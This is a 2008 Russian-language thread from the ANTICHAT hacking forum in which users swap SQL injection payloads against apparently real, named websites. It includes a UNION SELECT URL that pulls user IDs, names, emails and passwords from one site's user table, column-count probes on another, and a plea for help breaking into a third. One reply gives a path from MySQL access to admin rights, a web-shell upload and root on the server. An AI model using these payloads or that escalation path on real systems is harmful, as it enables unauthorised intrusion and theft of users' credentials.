ANTICHAT — форум по информационной безопасности, OSINT и технологиям
ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию.
Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club,
и теперь снова доступен на новом адресе —
forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
 |
|
03.12.2008, 22:30
|
|
Участник форума
Регистрация: 25.05.2007
Сообщений: 147
Провел на форуме:
2313429
Репутация:
728
|
|
Есть, но там по-моему только бенчмарком инфу из бд доставать посимвольно, ибо идет два запроса
|
|
|
03.12.2008, 22:40
|
|
Постоянный
Регистрация: 28.09.2007
Сообщений: 820
Провел на форуме:
6722038
Репутация:
1385
|
|
0nep@t0p, я бы так не утверждал .. 2 поля и причём вывод есть 
http://www.comingsoon.net/news.php?id=1+and+1=0+union+select+version(),1/*
4.1.22
на брут не ставил.. ибо мне это не к чему ..
|
|
|
|
03.12.2008, 22:43
|
|
Новичок
Регистрация: 25.10.2006
Сообщений: 10
Провел на форуме:
120981
Репутация:
1
|
|
тоесть в принципе можно поковырять до конца?  может у кого еще какие варианты,? |
|
|
|
03.12.2008, 23:34
|
|
Постоянный
Регистрация: 07.11.2007
Сообщений: 392
Провел на форуме:
1325167
Репутация:
100
|
|
Докопался до mysql сервера, благодаря чему есть возможно "дарить" максимальные права для определенных пользователей.
Mysql привязан к директадминЧеку....
Сам вопрос: можно ли при определенных махинациях с Mysql(не брут рутовых паролей) и "дарением" прав конкретным пользователям - получить неограниченный доступ хождения по папкам и файлам.
В то числе и рутовским.
такое можно сотворить?
|
|
|
|
03.12.2008, 23:36
|
|
Участник форума
Регистрация: 06.10.2006
Сообщений: 226
Провел на форуме:
3025546
Репутация:
1327
|
|
Товарищи, будте внимательнее =)
Код:
http://www.comingsoon.net/news.php?id=1+and+1=0+union+select+concat_ws(char(58),user_id,name,email,password,title,access),1+from+NEX_USERS+limit+0,1/*
|
|
|
|
03.12.2008, 23:52
|
|
Участник форума
Регистрация: 06.10.2006
Сообщений: 226
Провел на форуме:
3025546
Репутация:
1327
|
|
Сообщение от Ershik
Докопался до mysql сервера, благодаря чему есть возможно "дарить" максимальные права для определенных пользователей.
Mysql привязан к директадминЧеку....
Сам вопрос: можно ли при определенных махинациях с Mysql(не брут рутовых паролей) и "дарением" прав конкретным пользователям - получить неограниченный доступ хождения по папкам и файлам.
В то числе и рутовским.
такое можно сотворить?
Ну так для начала подари себе права админа, зайди в админку, через нее залей шелл, порутай систему и сможешь просматривать, под правами root все папки и файлы =)
PS Иначе никак, на то они и рутовские
|
|
|
|
04.12.2008, 12:52
|
|
Постоянный
Регистрация: 05.12.2006
Сообщений: 477
Провел на форуме:
11338585
Репутация:
441
|
|
Код:
http://db.zenyro.ru/items/use.html'
Возможна ли инъекция? |
|
|
|
04.12.2008, 13:07
|
|
Постоянный
Регистрация: 16.03.2007
Сообщений: 380
Провел на форуме:
1404552
Репутация:
568
|
|
DimOnOID
да это иьект твоя задача закоментировать не нужные данные запроса и подобрать количество колонок..
http://db.zenyro.ru/items/use.html'+union+select+1,2,3,4,5,6,7,8,9,10--+
Последний раз редактировалось sabe; 04.12.2008 в 13:17..
|
|
|
|
04.12.2008, 13:40
|
|
Постоянный
Регистрация: 05.12.2006
Сообщений: 477
Провел на форуме:
11338585
Репутация:
441
|
|
Сообщение от sabe
DimOnOID
да это иьект твоя задача закоментировать не нужные данные запроса и подобрать количество колонок..
http://db.zenyro.ru/items/use.html'order+by+2--+
1 колонка..вывода нету..как слепую заюзать не удаётца
|
|
|
|
04.12.2008, 17:33
|
|
Участник форума
Регистрация: 14.08.2007
Сообщений: 150
Провел на форуме:
686641
Репутация:
205
|
|
Проблема с:
Код HTML:
http://www.mcmusic.ie/index.asp?secID=1'&part=1
Помогите раскрутить. Очень нужно |
|
|
|
|
|
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Похожие темы
Линейный вид
